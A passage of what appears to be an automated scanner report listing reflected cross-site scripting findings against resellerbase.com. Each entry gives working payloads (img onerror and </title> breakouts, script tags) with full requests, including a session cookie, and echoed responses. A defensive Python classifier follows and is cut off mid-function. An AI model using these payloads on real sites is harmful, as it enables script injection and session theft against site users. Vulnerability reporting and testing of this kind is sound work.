The value of REST URL parameter 4 is copied into the HTML document as text between TITLE tags. The payload 134d6</title><img%20src%3da%20onerror%3dalert(1)>49a3bd0520c was submitted in the REST URL parameter 4. This input was echoed as 134d6</title><img src=a onerror=alert(1)>49a3bd0520c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images134d6</title><img%20src%3da%20onerror%3dalert(1)>49a3bd0520c/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images134d6</title><img src=a onerror=alert(1)>49a3bd0520c/rating/4half.gif</title>
...[SNIP]...

2.4502. http://www.resellerbase.com/tag/themes/kosmos/images/rating/4half.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d51ca<img%20src%3da%20onerror%3dalert(1)>9be68ca25b1 was submitted in the REST URL parameter 4. This input was echoed as d51ca<img src=a onerror=alert(1)>9be68ca25b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/imagesd51ca<img%20src%3da%20onerror%3dalert(1)>9be68ca25b1/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/imagesd51ca<img src=a onerror=alert(1)>9be68ca25b1/rating/4half.gif]</td>
...[SNIP]...

2.4503. http://www.resellerbase.com/tag/themes/kosmos/images/rating/4half.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 88495<img%20src%3da%20onerror%3dalert(1)>23d5603ec6d was submitted in the REST URL parameter 5. This input was echoed as 88495<img src=a onerror=alert(1)>23d5603ec6d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating88495<img%20src%3da%20onerror%3dalert(1)>23d5603ec6d/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/rating88495<img src=a onerror=alert(1)>23d5603ec6d/4half.gif]</td>
...[SNIP]...

2.4504. http://www.resellerbase.com/tag/themes/kosmos/images/rating/4half.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as text between TITLE tags. The payload aa1f4</title><img%20src%3da%20onerror%3dalert(1)>3042811ec34 was submitted in the REST URL parameter 5. This input was echoed as aa1f4</title><img src=a onerror=alert(1)>3042811ec34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/ratingaa1f4</title><img%20src%3da%20onerror%3dalert(1)>3042811ec34/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/ratingaa1f4</title><img src=a onerror=alert(1)>3042811ec34/4half.gif</title>
...[SNIP]...

2.4505. http://www.resellerbase.com/tag/themes/kosmos/images/rating/4half.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 4f42d<img%20src%3da%20onerror%3dalert(1)>de1d55e530e was submitted in the REST URL parameter 6. This input was echoed as 4f42d<img src=a onerror=alert(1)>de1d55e530e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating/4half.gif4f42d<img%20src%3da%20onerror%3dalert(1)>de1d55e530e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:55:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/rating/4half.gif4f42d<img src=a onerror=alert(1)>de1d55e530e]</td>
...[SNIP]...

2.4506. http://www.resellerbase.com/tag/themes/kosmos/images/rating/4half.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as text between TITLE tags. The payload d105a</title><img%20src%3da%20onerror%3dalert(1)>33a53ce2e62 was submitted in the REST URL parameter 6. This input was echoed as d105a</title><img src=a onerror=alert(1)>33a53ce2e62 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating/4half.gifd105a</title><img%20src%3da%20onerror%3dalert(1)>33a53ce2e62 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:55:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/rating/4half.gifd105a</title><img src=a onerror=alert(1)>33a53ce2e62</title>
...[SNIP]...

2.4507. http://www.resellerbase.com/tag/themes/kosmos/images/rating/5.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9fbe8<script>alert(1)</script>6fc2b4fe6a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag9fbe8<script>alert(1)</script>6fc2b4fe6a2/themes/kosmos/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:53:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag9fbe8<script>alert(1)</script>6fc2b4fe6a2/themes/kosmos/images/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.4508. http://www.resellerbase.com/tag/themes/kosmos/images/rating/5.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f6417<img%20src%3da%20onerror%3dalert(1)>4a798fe39ec was submitted in the REST URL parameter 2. This input was echoed as f6417<img src=a onerror=alert(1)>4a798fe39ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themesf6417<img%20src%3da%20onerror%3dalert(1)>4a798fe39ec/kosmos/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themesf6417<img src=a onerror=alert(1)>4a798fe39ec/kosmos/images/rating/5.gif]</td>
...[SNIP]...

2.4509. http://www.resellerbase.com/tag/themes/kosmos/images/rating/5.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 9ab7c</title><img%20src%3da%20onerror%3dalert(1)>b582bc11412 was submitted in the REST URL parameter 2. This input was echoed as 9ab7c</title><img src=a onerror=alert(1)>b582bc11412 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes9ab7c</title><img%20src%3da%20onerror%3dalert(1)>b582bc11412/kosmos/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes9ab7c</title><img src=a onerror=alert(1)>b582bc11412/kosmos/images/rating/5.gif</title>
...[SNIP]...

2.4510. http://www.resellerbase.com/tag/themes/kosmos/images/rating/5.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7ba03<img%20src%3da%20onerror%3dalert(1)>f3e942e7dc was submitted in the REST URL parameter 3. This input was echoed as 7ba03<img src=a onerror=alert(1)>f3e942e7dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos7ba03<img%20src%3da%20onerror%3dalert(1)>f3e942e7dc/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos7ba03<img src=a onerror=alert(1)>f3e942e7dc/images/rating/5.gif]</td>
...[SNIP]...

2.4511. http://www.resellerbase.com/tag/themes/kosmos/images/rating/5.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 9ac45</title><img%20src%3da%20onerror%3dalert(1)>8cb31aabc55 was submitted in the REST URL parameter 3. This input was echoed as 9ac45</title><img src=a onerror=alert(1)>8cb31aabc55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos9ac45</title><img%20src%3da%20onerror%3dalert(1)>8cb31aabc55/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos9ac45</title><img src=a onerror=alert(1)>8cb31aabc55/images/rating/5.gif</title>
...[SNIP]...

2.4512. http://www.resellerbase.com/tag/themes/kosmos/images/rating/5.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as text between TITLE tags. The payload 69a80</title><img%20src%3da%20onerror%3dalert(1)>3f43aa62892 was submitted in the REST URL parameter 4. This input was echoed as 69a80</title><img src=a onerror=alert(1)>3f43aa62892 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images69a80</title><img%20src%3da%20onerror%3dalert(1)>3f43aa62892/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images69a80</title><img src=a onerror=alert(1)>3f43aa62892/rating/5.gif</title>
...[SNIP]...

2.4513. http://www.resellerbase.com/tag/themes/kosmos/images/rating/5.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7d542<img%20src%3da%20onerror%3dalert(1)>e0c6ce3928d was submitted in the REST URL parameter 4. This input was echoed as 7d542<img src=a onerror=alert(1)>e0c6ce3928d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images7d542<img%20src%3da%20onerror%3dalert(1)>e0c6ce3928d/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images7d542<img src=a onerror=alert(1)>e0c6ce3928d/rating/5.gif]</td>
...[SNIP]...

2.4514. http://www.resellerbase.com/tag/themes/kosmos/images/rating/5.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8d5ac<img%20src%3da%20onerror%3dalert(1)>af0fff988c was submitted in the REST URL parameter 5. This input was echoed as 8d5ac<img src=a onerror=alert(1)>af0fff988c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating8d5ac<img%20src%3da%20onerror%3dalert(1)>af0fff988c/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/rating8d5ac<img src=a onerror=alert(1)>af0fff988c/5.gif]</td>
...[SNIP]...

2.4515. http://www.resellerbase.com/tag/themes/kosmos/images/rating/5.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as text between TITLE tags. The payload 8b87a</title><img%20src%3da%20onerror%3dalert(1)>03057eb71c5 was submitted in the REST URL parameter 5. This input was echoed as 8b87a</title><img src=a onerror=alert(1)>03057eb71c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating8b87a</title><img%20src%3da%20onerror%3dalert(1)>03057eb71c5/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/rating8b87a</title><img src=a onerror=alert(1)>03057eb71c5/5.gif</title>
...[SNIP]...

2.4516. http://www.resellerbase.com/tag/themes/kosmos/images/rating/5.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as text between TITLE tags. The payload 7a72a</title><img%20src%3da%20onerror%3dalert(1)>49f93810925 was submitted in the REST URL parameter 6. This input was echoed as 7a72a</title><img src=a onerror=alert(1)>49f93810925 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating/5.gif7a72a</title><img%20src%3da%20onerror%3dalert(1)>49f93810925 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:55:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/rating/5.gif7a72a</title><img src=a onerror=alert(1)>49f93810925</title>
...[SNIP]...

2.4517. http://www.resellerbase.com/tag/themes/kosmos/images/rating/5.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 1da2c<img%20src%3da%20onerror%3dalert(1)>43babaab3a7 was submitted in the REST URL parameter 6. This input was echoed as 1da2c<img src=a onerror=alert(1)>43babaab3a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating/5.gif1da2c<img%20src%3da%20onerror%3dalert(1)>43babaab3a7 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:55:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/rating/5.gif1da2c<img src=a onerror=alert(1)>43babaab3a7]</td>
...[SNIP]...
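The following is an added example, not code from the XSS.CX report or from resellerbase.com. It reproduces the check behind the two reflection contexts in the issues above (text between TITLE tags, which needs a </title> breakout before an event-handler tag, and plain text between tags, where a bare IMG tag is enough), runs it over the response fragments quoted above, and adds two constructed counter-cases: the probe left inside TITLE without a breakout, and the probe after HTML entity encoding, which is what a fix must produce. The prefix/probe/suffix split and the Reflection fields are this example's own naming, not the scanner's.

```python
"""Classify how a scanner canary came back in an HTTP response body.

Added example (not part of the XSS.CX report or the target application).
It reproduces the distinction the report draws between a reflection
"between TITLE tags" and one "as plain text between tags", and decides
whether the echoed payload would actually execute in a browser.
"""
import html
from dataclasses import dataclass


@dataclass(frozen=True)
class Reflection:
    status: str      # "raw", "encoded", "mangled" or "absent"
    context: str     # "title", "text" or "none"
    executes: bool   # True only if a browser would run the payload


def classify(body: str, prefix: str, probe: str, suffix: str) -> Reflection:
    """Find prefix+?+suffix in body and report what came back in between.

    prefix/suffix are the random nonces the scanner wraps around the probe
    (e.g. "7a72a" and "49f93810925" in the report); they let us locate the
    reflection even when the probe itself was altered.
    """
    start = body.find(prefix)
    if start == -1:
        return Reflection("absent", "none", False)
    end = body.find(suffix, start + len(prefix))
    if end == -1:
        return Reflection("absent", "none", False)
    echoed = body[start + len(prefix):end]

    if echoed == probe:
        status = "raw"
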